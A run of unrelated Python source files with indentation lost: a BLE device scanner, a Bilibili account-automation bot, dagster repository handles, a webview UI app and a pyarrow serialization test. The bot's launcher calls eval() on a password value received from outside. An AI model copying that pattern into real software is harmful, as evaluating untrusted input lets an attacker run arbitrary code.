self.logger.info("{0:<16}= {1}".format(
"Product Id", devIdInfo.productId))
if device.ServiceData:
for advuuid in device.ServiceData:
self.logger.info("{0:<16}= {1}".format(
"Adv UUID", str(advuuid)))
self.logger.info("{0:<16}= {1}".format(
"Adv Data", bytes(device.ServiceData[advuuid]).hex()))
else:
self.logger.info("")
self.logger.info("")
def scan_bg_implementation(self, **kwargs):
self.adapter.clear_adapter()
with self.chip_queue.mutex:
self.chip_queue.queue.clear()
self.adapter.adapter_bg_scan(True)
found = False
identifier = kwargs["identifier"]
timeout = kwargs["timeout"] + time.time()
self.device_uuid_list = []
self.peripheral_list = []
while time.time() < timeout:
scanned_peripheral_list = self.adapter.find_devices(
[
chip_service,
chip_service_short,
chromecast_setup_service,
chromecast_setup_service_short,
]
)
for device in scanned_peripheral_list:
try:
if not self.scan_quiet and device.Address not in self.device_uuid_list:
# display all scanned results
self.device_uuid_list.append(device.Address)
self.peripheral_list.append(device)
self.dump_scan_result(device)
devIdInfo = self.get_peripheral_devIdInfo(device)
if not devIdInfo:
# Not a chip device
continue
if identifier and (device.Name == identifier or str(device.Address).upper() == str(
identifier.upper()
) or str(devIdInfo.discriminator) == identifier):
if self.scan_quiet:
# only display the scanned target's info when quiet
self.dump_scan_result(device)
self.target = device
found = True
break
except Exception:
traceback.print_exc()
if found:
break
time.sleep(BLE_IDLE_DELTA)
self.adapter.adapter_bg_scan(False)
def scan(self, line):
args = self.ParseInputLine(line, "scan")
if not args:
return False
self.target = None
if not self.adapter:
self.logger.info("use default adapter")
self.ble_adapter_select()
del self.peripheral_list[:]
self.scan_quiet = args[1]
self.runLoopUntil(
self.scan_bg_implementation, timeout=args[0], identifier=args[2]
)
return True
def get_peripheral_devIdInfo(self, peripheral):
if not peripheral.ServiceData:
return None
for advuuid in peripheral.ServiceData:
if str(advuuid).lower() == str(chip_service).lower():
return ParseServiceData(bytes(peripheral.ServiceData[advuuid]))
return None
def ble_debug_log(self, line):
args = self.ParseInputLine(line)
if int(args[0]) == 1:
self.logger.setLevel(logging.DEBUG)
self.logger.debug("current logging level is debug")
else:
self.logger.setLevel(logging.INFO)
self.logger.info("current logging level is info")
return True
def CloseBle(self, connObj):
""" Called by Chip to close the BLE connection."""
# Workaround: comment out disconnect because of hang when close, plz call disconnect explicitly after close
# Need to fix it
# self.disconnect()
if self.devMgr:
dcEvent = BleDisconnectEvent(BLE_ERROR_REMOTE_DEVICE_DISCONNECTED)
self.chip_queue.put(dcEvent)
self.devMgr.DriveBleIO()
return True
|
test_main.py
|
import sys
import signal
import threading
import asyncio
from copy import deepcopy
import aiohttp
import conf_loader
import notifier
import bili_sched
import printer
import bili_statistics
from console_cmd import ConsoleCmd
from tasks.login import LoginTask
from tasks.live_daily_job import (HeartBeatTask, OpenSilverBoxTask, RecvDailyBagTask, SignTask, WatchTvTask,
SignFansGroupsTask, SendGiftTask, ExchangeSilverCoinTask)
from tasks.main_daily_job import (JudgeCaseTask, BiliMainTask, DahuiyuanTask)
from tasks.manga_daily_job import (ShareComicTask, MangaSignTask, )
from tasks.utils import UtilsTask
# 弹幕
from danmu.bili_danmu_monitor import DanmuPrinter, DanmuRaffleMonitor
from danmu.yj_monitor import TcpYjMonitorClient
from danmu import raffle_handler
# 实物抽奖
from substance.monitor_substance_raffle import SubstanceRaffleMonitor
from dyn.monitor_dyn_raffle import DynRaffleMonitor
from Service.Crsa import rsa_long_decrypt
from multiprocessing import connection
def run(user_info: dict, pipe: connection.Connection):
"""
:param user_info: 用户信息
:param pipe:进程间通信管道
:return:
"""
notifier.register_pipe(pipe)
user_info['password'] = rsa_long_decrypt(eval(user_info['password']))
user_info_copy = deepcopy(user_info)
# print(user_info['password'])
loop = asyncio.get_event_loop()
dict_bili = conf_loader.read_bili()
dict_color = conf_loader.read_color()
dict_ctrl = conf_loader.read_ctrl()
dict_task = conf_loader.read_task()
printer.init_config(dict_color, dict_ctrl['print_control']['danmu'])
############################################################################
############################################################################
# 👇users 录入程序
async def init_users():
global_task_control = dict_task['global_task_control']
custom_task_control = dict_task['custom_task_control']
global_task_arrangement = dict_task['global_task_arrangement']
custom_task_arrangement = dict_task['custom_task_arrangement']
users = notifier.Users(global_task_control=global_task_control,
global_task_arrangement=global_task_arrangement,
dict_bili=dict_bili,
force_sleep=bili_sched.force_sleep)
notifier.init(users=users)
username = user_info['username']
await notifier.add_user(user_info=user_info_copy,
custom_task_control=custom_task_control.get(username, {}),
custom_task_arrangement=custom_task_arrangement.get(username, {}))
loop.run_until_complete(init_users())
############################################################################
############################################################################
# 👇重复任务录入程序
# 时间间隔为小时,同时每次休眠结束都会计时归零,重新从当前时间计算时间间隔
# 下面表示每隔多少小时执行一次
def add_daily_jobs(tasks):
bili_sched.add_daily_jobs(HeartBeatTask, every_hours=6) # 心跳
bili_sched.add_daily_jobs(OpenSilverBoxTask, every_hours=6) # 每日开宝箱任务
bili_sched.add_daily_jobs(RecvDailyBagTask, every_hours=3) #
bili_sched.add_daily_jobs(SignTask, every_hours=6) # 直播签到
bili_sched.add_daily_jobs(WatchTvTask, every_hours=6) # 双端观看任务
bili_sched.add_daily_jobs(SignFansGroupsTask, every_hours=6) # 签名粉丝组任务
bili_sched.add_daily_jobs(SendGiftTask, every_hours=2) # 送礼物的任务
bili_sched.add_daily_jobs(ExchangeSilverCoinTask, every_hours=6) # 硬币兑换
bili_sched.add_daily_jobs(JudgeCaseTask, every_hours=0.75) # 风纪委员任务
bili_sched.add_daily_jobs(BiliMainTask, every_hours=4) # 主任务
bili_sched.add_daily_jobs(MangaSignTask, every_hours=6) # 漫画签到
bili_sched.add_daily_jobs(ShareComicTask, every_hours=6) # 漫画分享任务
bili_sched.add_daily_jobs(DahuiyuanTask, every_hours=6)
if user_info.get('tasks'):
tasks = user_info.get('tasks')
else:
tasks = []
add_daily_jobs(tasks)
############################################################################
############################################################################
# 登录
loop.run_until_complete(notifier.exec_task(LoginTask))
other_control = dict_ctrl['other_control']
area_ids = loop.run_until_complete(notifier.exec_func(UtilsTask.fetch_blive_areas))
area_duplicated = other_control['area_duplicated']
if area_duplicated:
area_ids *= 2
bili_statistics.init(area_num=len(area_ids), area_duplicated=area_duplicated)
default_roomid = other_control['default_monitor_roomid']
############################################################################
############################################################################
# 👇录入 monitors
# aiohttp sb session
async def init_monitors():
session = aiohttp.ClientSession()
monitors_ = []
# 弹幕打印功能
danmu_printer_ = DanmuPrinter(
room_id=default_roomid,
area_id=-1,
session=session)
# 弹幕抽奖监控
for area_id in area_ids:
monitor = DanmuRaffleMonitor(
room_id=0,
area_id=area_id,
session=session)
monitors_.append(monitor)
# yjmonitor 弹幕监控
yjmonitor_tcp_addr = other_control['yjmonitor_tcp_addr']
yjmonitor_tcp_key = other_control['yjmonitor_tcp_key']
if yjmonitor_tcp_key:
monitor = TcpYjMonitorClient(
key=yjmonitor_tcp_key,
url=yjmonitor_tcp_addr,
area_id=0)
monitors_.append(monitor)
if other_control['substance_raffle']:
monitors_.append(SubstanceRaffleMonitor())
if other_control['dyn_raffle']:
monitors_.append(DynRaffleMonitor(
should_join_immediately=other_control['join_dyn_raffle_at_once']))
return danmu_printer_, monitors_
danmu_printer, monitors = loop.run_until_complete(init_monitors())
############################################################################
############################################################################
bili_sched.init(monitors=monitors, sleep_ranges=dict_ctrl['other_control']['sleep_ranges'])
# 初始化控制台
if sys.platform != 'linux' or signal.getsignal(signal.SIGHUP) == signal.SIG_DFL:
console_thread = threading.Thread(
target=ConsoleCmd(loop, default_roomid, danmu_printer).cmdloop)
console_thread.start()
else:
console_thread = None
tasks = [monitor.run() for monitor in monitors]
other_tasks = [
bili_sched.run(),
raffle_handler.run(),
danmu_printer.run()
]
if other_tasks:
loop.run_until_complete(asyncio.wait(tasks + other_tasks))
loop.run_forever()
if console_thread is not None:
console_thread.join()
from Service.wbs import Client, test_cbk
if __name__ == '__main__':
client = Client()
client.register_cbk(test_cbk)
client.work("ws://127.0.0.1:8000/ws/Slaver", run)
|
handle.py
|
import sys
import threading
from abc import ABCMeta, abstractmethod
from collections import namedtuple
import six
from dagster import check
from dagster.api.list_repositories import sync_list_repositories_grpc
from dagster.core.definitions.reconstructable import repository_def_from_pointer
from dagster.core.errors import DagsterInvariantViolationError
from dagster.core.host_representation.origin import (
ExternalRepositoryOrigin,
GrpcServerRepositoryLocationOrigin,
InProcessRepositoryLocationOrigin,
ManagedGrpcPythonEnvRepositoryLocationOrigin,
RepositoryLocationOrigin,
)
from dagster.core.host_representation.selector import PipelineSelector
from dagster.core.instance import DagsterInstance
from dagster.core.origin import RepositoryGrpcServerOrigin, RepositoryOrigin, RepositoryPythonOrigin
def _get_repository_python_origin(executable_path, repository_code_pointer_dict, repository_name):
if repository_name not in repository_code_pointer_dict:
raise DagsterInvariantViolationError(
"Unable to find repository name {} on GRPC server.".format(repository_name)
)
code_pointer = repository_code_pointer_dict[repository_name]
return RepositoryPythonOrigin(executable_path=executable_path, code_pointer=code_pointer)
class RepositoryLocationHandle(six.with_metaclass(ABCMeta)):
def __enter__(self):
return self
def __exit__(self, exception_type, exception_value, traceback):
self.cleanup()
def cleanup(self):
pass
@staticmethod
def create_from_repository_location_origin(repo_location_origin):
check.inst_param(repo_location_origin, "repo_location_origin", RepositoryLocationOrigin)
if isinstance(repo_location_origin, ManagedGrpcPythonEnvRepositoryLocationOrigin):
return ManagedGrpcPythonEnvRepositoryLocationHandle(repo_location_origin)
elif isinstance(repo_location_origin, GrpcServerRepositoryLocationOrigin):
return GrpcServerRepositoryLocationHandle(repo_location_origin)
elif isinstance(repo_location_origin, InProcessRepositoryLocationOrigin):
return InProcessRepositoryLocationHandle(repo_location_origin)
else:
check.failed("Unexpected repository location origin")
@staticmethod
def create_from_repository_origin(repository_origin, instance):
check.inst_param(repository_origin, "repository_origin", RepositoryOrigin)
check.inst_param(instance, "instance", DagsterInstance)
if isinstance(repository_origin, RepositoryGrpcServerOrigin):
return RepositoryLocationHandle.create_from_repository_location_origin(
GrpcServerRepositoryLocationOrigin(
port=repository_origin.port,
socket=repository_origin.socket,
host=repository_origin.host,
)
)
elif isinstance(repository_origin, RepositoryPythonOrigin):
loadable_target_origin = repository_origin.loadable_target_origin
repo_location_origin = ManagedGrpcPythonEnvRepositoryLocationOrigin(
loadable_target_origin
)
return RepositoryLocationHandle.create_from_repository_location_origin(
repo_location_origin
)
else:
raise DagsterInvariantViolationError("Unexpected repository origin type")
@abstractmethod
def get_repository_python_origin(self, repository_name):
pass
class GrpcServerRepositoryLocationHandle(RepositoryLocationHandle):
"""
Represents a gRPC server that Dagster is not responsible for managing.
"""
def __init__(self, origin):
from dagster.grpc.client import DagsterGrpcClient
self.origin = check.inst_param(origin, "origin", GrpcServerRepositoryLocationOrigin)
port = self.origin.port
socket = self.origin.socket
host = self.origin.host
self.client = DagsterGrpcClient(port=port, socket=socket, host=host)
list_repositories_response = sync_list_repositories_grpc(self.client)
self.repository_names = set(
symbol.repository_name for symbol in list_repositories_response.repository_symbols
)
self.executable_path = list_repositories_response.executable_path
self.repository_code_pointer_dict = list_repositories_response.repository_code_pointer_dict
@property
def port(self):
return self.origin.port
@property
def socket(self):
return self.origin.socket
@property
def host(self):
return self.origin.host
@property
def location_name(self):
return self.origin.location_name
def get_current_image(self):
job_image = self.client.get_current_image().current_image
if not job_image:
raise DagsterInvariantViolationError(
"Unable to get current image that GRPC server is running. Please make sure that "
"env var DAGSTER_CURRENT_IMAGE is set in the GRPC server and contains the most "
"up-to-date user code image and tag. Exiting."
)
return job_image
def get_repository_python_origin(self, repository_name):
return _get_repository_python_origin(
self.executable_path, self.repository_code_pointer_dict, repository_name
)
def reload_repository_python_origin(self, repository_name):
check.str_param(repository_name, "repository_name")
list_repositories_response = sync_list_repositories_grpc(self.client)
return _get_repository_python_origin(
list_repositories_response.executable_path,
list_repositories_response.repository_code_pointer_dict,
repository_name,
)
class ManagedGrpcPythonEnvRepositoryLocationHandle(RepositoryLocationHandle):
"""
A Python environment for which Dagster is managing a gRPC server.
"""
def __init__(self, origin):
from dagster.grpc.client import client_heartbeat_thread
from dagster.grpc.server import GrpcServerProcess
self.origin = check.inst_param(
origin, "origin", ManagedGrpcPythonEnvRepositoryLocationOrigin
)
loadable_target_origin = origin.loadable_target_origin
self.grpc_server_process = GrpcServerProcess(
loadable_target_origin=loadable_target_origin,
max_workers=2,
heartbeat=True,
lazy_load_user_code=True,
)
try:
self.client = self.grpc_server_process.create_ephemeral_client()
self.heartbeat_shutdown_event = threading.Event()
self.heartbeat_thread = threading.Thread(
target=client_heartbeat_thread, args=(self.client, self.heartbeat_shutdown_event)
)
self.heartbeat_thread.daemon = True
self.heartbeat_thread.start()
list_repositories_response = sync_list_repositories_grpc(self.client)
except:
self.cleanup()
raise
self.repository_code_pointer_dict = list_repositories_response.repository_code_pointer_dict
def get_repository_python_origin(self, repository_name):
return _get_repository_python_origin(
self.executable_path, self.repository_code_pointer_dict, repository_name
)
@property
def executable_path(self):
return self.loadable_target_origin.executable_path
@property
def location_name(self):
return self.origin.location_name
@property
def loadable_target_origin(self):
return self.origin.loadable_target_origin
@property
def repository_names(self):
return set(self.repository_code_pointer_dict.keys())
@property
def host(self):
return "localhost"
@property
def port(self):
return self.grpc_server_process.port
@property
def socket(self):
return self.grpc_server_process.socket
def cleanup(self):
if self.heartbeat_shutdown_event:
self.heartbeat_shutdown_event.set()
self.heartbeat_shutdown_event = None
if self.heartbeat_thread:
self.heartbeat_thread.join()
self.heartbeat_thread = None
if self.client:
self.client.cleanup_server()
self.client = None
@property
def is_cleaned_up(self):
return not self.client
def __del__(self):
check.invariant(
self.is_cleaned_up,
"Deleting a ManagedGrpcPythonEnvRepositoryLocationHandle without first cleaning it up."
" This may indicate that the handle is not being used as a contextmanager.",
)
class InProcessRepositoryLocationHandle(RepositoryLocationHandle):
def __init__(self, origin):
self.origin = check.inst_param(origin, "origin", InProcessRepositoryLocationOrigin)
pointer = self.origin.recon_repo.pointer
repo_def = repository_def_from_pointer(pointer)
self.repository_code_pointer_dict = {repo_def.name: pointer}
@property
def location_name(self):
return self.origin.location_name
def get_repository_python_origin(self, repository_name):
return _get_repository_python_origin(
sys.executable, self.repository_code_pointer_dict, repository_name
)
class RepositoryHandle(
namedtuple("_RepositoryHandle", "repository_name repository_location_handle")
):
def __new__(cls, repository_name, repository_location_handle):
return super(RepositoryHandle, cls).__new__(
cls,
check.str_param(repository_name, "repository_name"),
check.inst_param(
repository_location_handle, "repository_location_handle", RepositoryLocationHandle
),
)
def get_origin(self):
if isinstance(self.repository_location_handle, InProcessRepositoryLocationHandle):
return RepositoryPythonOrigin(
code_pointer=self.repository_location_handle.repository_code_pointer_dict[
self.repository_name
],
executable_path=sys.executable,
)
elif isinstance(
self.repository_location_handle, ManagedGrpcPythonEnvRepositoryLocationHandle
):
return RepositoryPythonOrigin(
code_pointer=self.repository_location_handle.repository_code_pointer_dict[
self.repository_name
],
executable_path=self.repository_location_handle.executable_path,
)
elif isinstance(self.repository_location_handle, GrpcServerRepositoryLocationHandle):
return RepositoryGrpcServerOrigin(
host=self.repository_location_handle.host,
port=self.repository_location_handle.port,
socket=self.repository_location_handle.socket,
repository_name=self.repository_name,
)
else:
check.failed(
"Can not target represented RepositoryDefinition locally for repository from a {}.".format(
self.repository_location_handle.__class__.__name__
)
)
def get_external_origin(self):
return ExternalRepositoryOrigin(
self.repository_location_handle.origin, self.repository_name,
)
def get_python_origin(self):
return self.repository_location_handle.get_repository_python_origin(self.repository_name)
class PipelineHandle(namedtuple("_PipelineHandle", "pipeline_name repository_handle")):
def __new__(cls, pipeline_name, repository_handle):
return super(PipelineHandle, cls).__new__(
cls,
check.str_param(pipeline_name, "pipeline_name"),
check.inst_param(repository_handle, "repository_handle", RepositoryHandle),
)
def to_string(self):
return "{self.location_name}.{self.repository_name}.{self.pipeline_name}".format(self=self)
@property
def repository_name(self):
return self.repository_handle.repository_name
@property
def location_name(self):
return self.repository_handle.repository_location_handle.location_name
def get_origin(self):
return self.repository_handle.get_origin().get_pipeline_origin(self.pipeline_name)
def get_external_origin(self):
return self.repository_handle.get_external_origin().get_pipeline_origin(self.pipeline_name)
def get_python_origin(self):
return self.repository_handle.get_python_origin().get_pipeline_origin(self.pipeline_name)
def to_selector(self):
return PipelineSelector(self.location_name, self.repository_name, self.pipeline_name, None)
class ScheduleHandle(namedtuple("_ScheduleHandle", "schedule_name repository_handle")):
def __new__(cls, schedule_name, repository_handle):
return super(ScheduleHandle, cls).__new__(
cls,
check.str_param(schedule_name, "schedule_name"),
check.inst_param(repository_handle, "repository_handle", RepositoryHandle),
)
@property
def repository_name(self):
return self.repository_handle.repository_name
@property
def location_name(self):
return self.repository_handle.repository_location_handle.location_name
def get_origin(self):
return self.repository_handle.get_origin().get_schedule_origin(self.schedule_name)
def get_external_origin(self):
return self.repository_handle.get_external_origin().get_schedule_origin(self.schedule_name)
class PartitionSetHandle(namedtuple("_PartitionSetHandle", "partition_set_name repository_handle")):
def __new__(cls, partition_set_name, repository_handle):
return super(PartitionSetHandle, cls).__new__(
cls,
check.str_param(partition_set_name, "partition_set_name"),
check.inst_param(repository_handle, "repository_handle", RepositoryHandle),
)
@property
def repository_name(self):
return self.repository_handle.repository_name
@property
def location_name(self):
return self.repository_handle.repository_location_handle.location_name
|
app.py
|
#coding: utf-8
from youey.view import *
import json, os
from urllib.parse import unquote
import platform
platf = platform.platform()
webview_provider = 'Pythonista' if 'iPhone' in platf or 'iPad' in platf else 'pywebview'
class AppBase(View):
def __init__(self, title='Youey App', fullscreen=None):
self.root = self
self._all_views_by_id = {}
self.views = {}
self._fullscreen = self.fullscreen_default if fullscreen is None else fullscreen
self._enabled_js_libraries = set()
with open(os.path.dirname(__file__)+'/main-ui.html', 'r', encoding='utf-8') as main_html_file:
#with open('youey/main-ui.html', 'r', encoding='utf-8') as main_html_file:
main_html = main_html_file.read()
main_html = main_html.replace('[actual send code]', self.callback_code)
self.open_webview(title, main_html)
def _set_event_handler(self, view, event, handler, options):
view._event_handlers[event] = handler
self.webview.eval_js(f'''
mc = new Hammer.Manager(document.getElementById("{view.id}"));
mc.on("{event}", function(ev) {{
id = "{view.id}";
type = ev.type;
sendEvent(type, id, ev);
}});
''')
#self.webview.eval_js(f'youey_handlers["{view.id}-{event}"] = true;')
if len(view._event_handlers) == 1:
view._events_enabled = True
def _remove_event_handler(self, view, event):
del view._event_handlers[event]
#self.webview.eval_js(f'youey_handlers["{view.id}-{event}"] = false;')
if len(view._event_handlers) == 0:
view._events_enabled = False
def _handle_event_callback(self, event, params):
if event == 'hammer.input':
print('unhandled hammer.input')
return
target = self
event_args = params
if len(params) == 1 and type(params[0]) is dict and 'id' in params[0]:
id = params[0]['id']
target = self._all_views_by_id[id]
getattr(target, 'on_'+event)()
return
if len(params) == 2:
id = params[0]
target = self._all_views_by_id[id]
event_args = params[1]
if event == 'action':
getattr(target, 'on_action')()
else:
handler = getattr(target, 'on_'+event)
handler(event_args)
def on_error(self, params):
raise Exception('JavaScript error:\n' + json.dumps(params[0], indent=2))
def on_load(self, params):
self._enable_js_library('local:hammer')
super().__init__(self, id='App')
def on_app_close(self):
close_handler = getattr(self, 'on_close', None)
if callable(close_handler):
close_handler()
def on_window_resize(self, params):
self.width, self.height = float(self.webview.eval_js('window.innerWidth')), float(self.webview.eval_js('window.innerHeight'))
def apply_theme(self):
self.background_color = self.theme.background
def _add_child_for(self, child, parent):
if parent is child: return
if child not in parent.children:
parent.children.append(child)
js = JSWrapper(self.webview)
parent_elem = js.by_id(parent.id)
parent_elem.append(child.render())
self._all_views_by_id[child.id] = child
def _remove_child_from(self, child, parent):
if parent is child: return
parent.children.remove(child)
js = JSWrapper(self.webview)
child_elem = js.by_id(child.id)
child_elem.remove()
def _update_all_dependencies(self, changed_view):
try:
changed_view.on_resize()
except: pass
if len(changed_view.children) + len(changed_view._dependents) == 0:
return
seen_deps = set()
seen_views = set()
deps_per_view = {}
visit_queue = [changed_view]
update_queue = []
while visit_queue:
view = visit_queue.pop(0)
seen_views.add(view)
visit_queue += [ child_view for child_view in view.children if child_view not in seen_views]
for dep_view, dep_prop in view._dependents:
if dep_view not in seen_views:
visit_queue.append(dep_view)
deps_per_view.setdefault(dep_view, []).append(dep_prop)
try:
update_queue.remove(dep_view)
except ValueError: pass
update_queue.append(dep_view)
for dep_view in update_queue:
for dep_prop in deps_per_view[dep_view]:
dep_view._refresh(dep_prop)
try:
dep_view.update_layout()
except AttributeError:
pass
for view in update_queue:
try:
dep_view.on_resize()
except: pass
def _enable_js_library(self, library_name):
if library_name in self._enabled_js_libraries:
return
if library_name.startswith('local:'):
abs_root_path = os.path.dirname(__file__)
start_path = f"{abs_root_path}/resources/js/{library_name[len('local:'):]}"
for extension in ['','.min.js','.js']:
lib_path = start_path + extension
if os.path.exists(lib_path):
break
with open(lib_path, 'r') as f:
script_code = f.read()
#script_code += '\nvar hammertime = new Hammer(document.body); var youey_handlers = {};\n'
self.webview.eval_js(script_code)
#JSWrapper(self.webview).dot('head').append(js)
self._enabled_js_libraries.add(library_name)
if webview_provider == 'Pythonista':
import ui
class CloseCatcher(ui.View):
def __init__(self, app, **kwargs):
self.app = app
super().__init__(**kwargs)
def will_close(self):
self.app.on_app_close()
class App(AppBase):
fullscreen_default = True
event_prefix = 'youey-event:'
callback_code = 'window.location.href="youey-event:" + encodeURIComponent(JSON.stringify(package));'
def open_webview(self, title, html):
close_catcher = CloseCatcher(self)
wv = self.webview = ui.WebView(frame=close_catcher.bounds, flex='WH')
close_catcher.add_subview(wv)
wv.background_color = self.default_theme.background.hex
wv.scales_page_to_fit = False
wv.objc_instance.subviews()[0].subviews()[0].setScrollEnabled(False)
wv.delegate = self
wv.load_html(html)
kwargs = {
'animated': False,
'title_bar_color': wv.background_color
}
if self._fullscreen:
kwargs['hide_title_bar'] = True
close_catcher.present('full_screen', **kwargs)
else:
close_catcher.present()
def webview_should_start_load(self, webview, url, nav_type):
if url.startswith(self.event_prefix):
event_info = json.loads(unquote(url[len(self.event_prefix):]))
event = event_info['event']
params = event_info['params']
self._handle_event_callback(event, params)
return False
return True
elif webview_provider == 'pywebview':
import webview, threading
class Api:
def __init__(self, app):
self.app = app
def youey_event(self, package):
event_name = package['event']
params = package['params']
self.app._handle_event_callback(event_name, params)
class App(AppBase):
fullscreen_default = False
callback_code = 'window.pywebview.api.youey_event(package);'
def open_webview(self, title, html):
with open('youey/main-ui-pywebview.html', 'w', encoding='utf-8') as actual_html_file:
main_html = actual_html_file.write(html)
self.html = html
self.webview = self
#t = threading.Thread(target=self.ensur)
#t.start()
webview.create_window(
title, url='youey/main-ui-pywebview.html', js_api=Api(self), fullscreen=self._fullscreen, background_color=self.default_theme.background.hex)
self.on_app_close()
def eval_js(self, js):
return webview.evaluate_js(js, 'master')
if __name__ == '__main__':
pass
|
test_serialization.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import division
import pytest
from collections import namedtuple, OrderedDict, defaultdict
import datetime
import os
import string
import sys
import pyarrow as pa
import numpy as np
try:
import torch
except ImportError:
torch = None
# Blacklist the module in case `import torch` is costly before
# failing (ARROW-2071)
sys.modules['torch'] = None
def assert_equal(obj1, obj2):
if torch is not None and torch.is_tensor(obj1) and torch.is_tensor(obj2):
assert torch.equal(obj1, obj2)
return
module_numpy = (type(obj1).__module__ == np.__name__ or
type(obj2).__module__ == np.__name__)
if module_numpy:
empty_shape = ((hasattr(obj1, "shape") and obj1.shape == ()) or
(hasattr(obj2, "shape") and obj2.shape == ()))
if empty_shape:
# This is a special case because currently np.testing.assert_equal
# fails because we do not properly handle different numerical
# types.
assert obj1 == obj2, ("Objects {} and {} are "
"different.".format(obj1, obj2))
else:
np.testing.assert_equal(obj1, obj2)
elif hasattr(obj1, "__dict__") and hasattr(obj2, "__dict__"):
special_keys = ["_pytype_"]
assert (set(list(obj1.__dict__.keys()) + special_keys) ==
set(list(obj2.__dict__.keys()) + special_keys)), ("Objects {} "
"and {} are "
"different."
.format(
obj1,
obj2))
try:
# Workaround to make comparison of OrderedDicts work on Python 2.7
if obj1 == obj2:
return
except Exception:
pass
if obj1.__dict__ == {}:
print("WARNING: Empty dict in ", obj1)
for key in obj1.__dict__.keys():
if key not in special_keys:
assert_equal(obj1.__dict__[key], obj2.__dict__[key])
elif type(obj1) is dict or type(obj2) is dict:
assert_equal(obj1.keys(), obj2.keys())
for key in obj1.keys():
assert_equal(obj1[key], obj2[key])
elif type(obj1) is list or type(obj2) is list:
assert len(obj1) == len(obj2), ("Objects {} and {} are lists with "
"different lengths."
.format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif type(obj1) is tuple or type(obj2) is tuple:
assert len(obj1) == len(obj2), ("Objects {} and {} are tuples with "
"different lengths."
.format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif (pa.lib.is_named_tuple(type(obj1)) or
pa.lib.is_named_tuple(type(obj2))):
assert len(obj1) == len(obj2), ("Objects {} and {} are named tuples "
"with different lengths."
.format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
else:
assert obj1 == obj2, ("Objects {} and {} are different."
.format(obj1, obj2))
PRIMITIVE_OBJECTS = [
0, 0.0, 0.9, 1 << 62, 1 << 999,
[1 << 100, [1 << 100]], "a", string.printable, "\u262F",
"hello world", u"hello world", u"\xff\xfe\x9c\x001\x000\x00",
None, True, False, [], (), {}, {(1, 2): 1}, {(): 2},
[1, "hello", 3.0], u"\u262F", 42.0, (1.0, "hi"),
[1, 2, 3, None], [(None,), 3, 1.0], ["h", "e", "l", "l", "o", None],
(None, None), ("hello", None), (True, False),
{True: "hello", False: "world"}, {"hello": "world", 1: 42, 2.5: 45},
{"hello": set([2, 3]), "world": set([42.0]), "this": None},
np.int8(3), np.int32(4), np.int64(5),
np.uint8(3), np.uint32(4), np.uint64(5), np.float16(1.9), np.float32(1.9),
np.float64(1.9), np.zeros([8, 20]),
np.random.normal(size=[17, 10]), np.array(["hi", 3]),
np.array(["hi", 3], dtype=object),
np.random.normal(size=[15, 13]).T,
]
if sys.version_info >= (3, 0):
PRIMITIVE_OBJECTS += [0, np.array([["hi", u"hi"], [1.3, 1]])]
else:
PRIMITIVE_OBJECTS += [long(42), long(1 << 62), long(0), # noqa
np.array([["hi", u"hi"],
[1.3, long(1)]])] # noqa
COMPLEX_OBJECTS = [
[[[[[[[[[[[[]]]]]]]]]]]],
{"obj{}".format(i): np.random.normal(size=[4, 4]) for i in range(5)},
# {(): {(): {(): {(): {(): {(): {(): {(): {(): {(): {
# (): {(): {}}}}}}}}}}}}},
((((((((((),),),),),),),),),),
{"a": {"b": {"c": {"d": {}}}}},
]
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
class Bar(object):
def __init__(self):
for i, val in enumerate(COMPLEX_OBJECTS):
setattr(self, "field{}".format(i), val)
class Baz(object):
def __init__(self):
self.foo = Foo()
self.bar = Bar()
def method(self, arg):
pass
class Qux(object):
def __init__(self):
self.objs = [Foo(1), Foo(42)]
class SubQux(Qux):
def __init__(self):
Qux.__init__(self)
class SubQuxPickle(Qux):
def __init__(self):
Qux.__init__(self)
class CustomError(Exception):
pass
Point = namedtuple("Point", ["x", "y"])
NamedTupleExample = namedtuple("Example",
"field1, field2, field3, field4, field5")
CUSTOM_OBJECTS = [Exception("Test object."), CustomError(), Point(11, y=22),
Foo(), Bar(), Baz(), Qux(), SubQux(), SubQuxPickle(),
NamedTupleExample(1, 1.0, "hi", np.zeros([3, 5]), [1, 2, 3]),
OrderedDict([("hello", 1), ("world", 2)])]
def make_serialization_context():
context = pa.default_serialization_context()
context.register_type(Foo, "Foo")
context.register_type(Bar, "Bar")
context.register_type(Baz, "Baz")
context.register_type(Qux, "Quz")
context.register_type(SubQux, "SubQux")
context.register_type(SubQuxPickle, "SubQuxPickle", pickle=True)
context.register_type(Exception, "Exception")
context.register_type(CustomError, "CustomError")
context.register_type(Point, "Point")
context.register_type(NamedTupleExample, "NamedTupleExample")
return context
global_serialization_context = make_serialization_context()
def serialization_roundtrip(value, scratch_buffer,
context=global_serialization_context):
writer = pa.FixedSizeBufferWriter(scratch_buffer)
pa.serialize_to(value, writer, context=context)
reader = pa.BufferReader(scratch_buffer)
result = pa.deserialize_from(reader, None, context=context)
assert_equal(value, result)
_check_component_roundtrip(value, context=context)
def _check_component_roundtrip(value, context=global_serialization_context):
# Test to/from components
serialized = pa.serialize(value, context=context)
components = serialized.to_components()
from_comp = pa.SerializedPyObject.from_components(components)
recons = from_comp.deserialize(context=context)
assert_equal(value, recons)
@pytest.yield_fixture(scope='session')
def large_buffer(size=32*1024*1024):
return pa.allocate_buffer(size)
def large_memory_map(tmpdir_factory, size=100*1024*1024):
path = (tmpdir_factory.mktemp('data')
.join('pyarrow-serialization-tmp-file').strpath)
# Create a large memory mapped file
with open(path, 'wb') as f:
f.write(np.random.randint(0, 256, size=size)
.astype('u1')
.tobytes()
[:size])
return path
def test_clone():
context = pa.SerializationContext()
class Foo(object):
pass
def custom_serializer(obj):
return 0
def custom_deserializer(serialized_obj):
return (serialized_obj, 'a')
